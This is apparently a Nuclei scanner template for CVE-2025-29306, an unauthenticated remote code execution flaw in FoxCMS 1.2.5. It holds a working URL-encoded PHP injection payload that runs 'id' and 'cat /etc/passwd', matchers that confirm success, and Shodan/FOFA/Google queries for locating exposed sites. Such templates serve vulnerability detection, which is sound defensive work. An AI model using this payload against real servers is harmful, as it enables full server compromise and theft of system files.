id: CVE-2025-29306

info:
  name: FoxCMS v.1.2.5 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
  impact: |
    Unauthenticated attackers can execute arbitrary code through the id parameter in the index.html component, leading to complete server compromise.
  remediation: |
    Update to the latest version of FOXCMS if available. If no patch is available, implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' parameter values.
  reference:
    - https://github.com/verylazytech/CVE-2025-29306/blob/main/CVE-2025-29306.sh
    - https://medium.com/@verylazytech
    - https://nvd.nist.gov/vuln/detail/CVE-2025-29306
  classification:
    epss-score: 0.86208
    epss-percentile: 0.99422
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-29306
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 1
    fofa-query: (body="foxcms-logo" || body="foxcms-container") && body="div"
    google-query: intitle:"FOXCMS" intext:"foxcms-logo"
    shodan-query: html:"foxcms-logo"
  tags: cve,cve2025,rce,foxcms,unauth,oast,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"

    payloads:
      command:
        - "id"
        - "cat /etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
          - "root:.*:0:0:"
        condition: or

      - type: word
        part: body
        words:
          - "foxcms"
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200cef2e3f020516d15849c68d80dad9b97f38389438bf286cf0f0cd46e4afe960022100dea707cbc4647832ac35678a36153d06e19120ff2f670086f7ff5fd341c931e4:922c64590222798bb761d5b6d8e72950